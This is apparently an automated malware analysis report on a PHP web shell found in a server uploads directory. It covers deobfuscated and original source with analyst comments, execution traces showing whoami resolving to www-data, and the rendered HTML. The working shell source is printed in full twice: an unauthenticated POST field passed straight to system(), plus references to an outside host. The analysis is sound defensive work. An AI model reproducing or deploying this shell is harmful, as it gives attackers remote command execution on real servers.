PHP Malware Analysis

cmd.php, memek.php

md5: b1c8840d92018cc758f58d77bb95bfb5


Deobfuscated PHP code

<?php
// Analyst notes (review): single-file PHP web shell. The `id` query-string
// parameter selects one of two paths: `?id=cmd` executes a command and returns
// only its output; any other request renders the HTML front-end below.
// Neither path has authentication, a command allow-list, or CSRF protection.

// Loose comparison (==) on an unvalidated $_GET key. An absent `id` key raises
// an undefined-index notice/warning (PHP-version dependent) and falls through
// to the front-end.
if ($_GET['id'] == 'cmd') {
    // The command arrives in the POST field `ekseCMD`, which is set by the
    // jQuery submit handler at the bottom of this file.
    if (isset($_POST['ekseCMD'])) {
        $result = $_POST['ekseCMD'];
        // The raw command text is echoed back into HTML without escaping, so
        // the response also reflects attacker-controlled markup.
        print "<b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <cmd>{$result}</cmd><br>";
        // Unauthenticated remote command execution: the POST value is handed
        // verbatim to system(), with stderr merged into stdout so error text is
        // returned as well. The process runs as the web-server user (the
        // traces below resolve `whoami` to www-data).
        system($_POST['ekseCMD'] . ' 2>&1');
    }
    // Terminate so the AJAX response body contains only the command output.
    exit;
}
?>
<!-- Front-end served for non-cmd requests: a fake terminal page that posts
     commands back to ?id=cmd via jQuery (see the <script> block at the end). -->
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<!-- Protocol-relative references to a third-party host; together with
		     the typed.js include near the end of the body these are the page's
		     outbound network indicators. -->
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	</head>
<style>
/* Cosmetic styling for the fake terminal; nothing here affects execution. */
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style>
<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text"></span><span class="cursor">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br><?php 
// Runs on every front-end page load with no user input and prints the
// web-server user into the result pane. The second argument only receives
// system()'s exit status; the variable is never read afterwards.
system("whoami", $result);
?></pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">&copy; <?php 
// Footer year; the only other PHP call visible in the execution traces.
echo date('Y');
?> UnknownSec</div>
		</div>
	</div>
</div>
<script>
// Intercepts the form submit and sends the typed command as an AJAX POST to the
// form's action (?id=cmd) under the field name the PHP side reads (ekseCMD).
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
// Response callback: the raw server reply (command output) replaces the
// contents of the #result pane.
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>
</body>
</html>

Execution traces

data/traces/b1c8840d92018cc758f58d77bb95bfb5_trace-1676238692.6263.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:51:58.524167]
1	0	1	0.000220	393512
1	3	0	0.000303	398568	{main}	1		/var/www/html/uploads/memek.php	0	0
2	4	0	0.000353	398592	system	0		/var/www/html/uploads/memek.php	71	2	'whoami'	NULL
2	4	1	0.001790	398704
2	4	R			'www-data'
2	5	0	0.001818	398592	date	0		/var/www/html/uploads/memek.php	78	1	'Y'
2	5	1	0.001878	400944
2	5	R			'2023'
1	3	1	0.001896	400656
			0.001927	314280
TRACE END   [2023-02-12 19:51:58.525921]

data/traces/b1c8840d92018cc758f58d77bb95bfb5_trace-1676256127.6132.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:42:33.511006]
1	0	1	0.000185	393512
1	3	0	0.000257	398568	{main}	1		/var/www/html/uploads/cmd.php	0	0
2	4	0	0.000295	398592	system	0		/var/www/html/uploads/cmd.php	71	2	'whoami'	NULL
2	4	1	0.001773	398704
2	4	R			'www-data'
2	5	0	0.001803	398592	date	0		/var/www/html/uploads/cmd.php	78	1	'Y'
2	5	1	0.001864	400944
2	5	R			'2023'
1	3	1	0.001883	400656
			0.001919	314280
TRACE END   [2023-02-13 00:42:33.512774]


Generated HTML code

<html lang="en"><head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	<style>
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style></head>

<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text">usage &gt; whoami | id | uname</span><span class="cursor typing">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br>www-data
</pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">© 2023 UnknownSec</div>
		</div>
	</div>
</div>
<script>
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>

</body></html>

Original PHP code

<?php
// Analyst notes (review): original (pre-normalisation) form of the web shell.
// `?id=cmd` selects the command-execution path; any other request renders the
// HTML front-end. No authentication or input validation on either path.
if($_GET['id'] == 'cmd') {
if(isset($_POST['ekseCMD'])) {
	$result = $_POST['ekseCMD'];
		// Command text reflected into the HTML response unescaped.
		print "<b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <cmd>$result</cmd><br>";
		// Unauthenticated remote command execution as the web-server user;
		// stderr is merged into stdout so error text is returned too.
		system($_POST['ekseCMD'].' 2>&1');
	}
// Only the command output is returned to the AJAX caller.
exit;
}
?>
<!-- Front-end: fake terminal that posts commands back to ?id=cmd via jQuery. -->
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<!-- Third-party host references (here and the typed.js include at the
		     end of the body) are the page's outbound network indicators. -->
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	</head>
<style>
/* Cosmetic styling for the fake terminal; not execution-relevant. */
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style>
<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text"></span><span class="cursor">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<!-- `whoami` runs on every page load with no user input; the
					     second argument only receives the exit status and is never read. -->
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br><?php system("whoami", $result);?></pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">&copy; <?=date('Y');?> UnknownSec</div>
		</div>
	</div>
</div>
<script>
// Submits the typed command as an AJAX POST (field ekseCMD) to the form's
// action (?id=cmd) instead of a normal form submission.
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
// Response callback: the raw server reply replaces the #result pane contents.
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>
</body>
</html>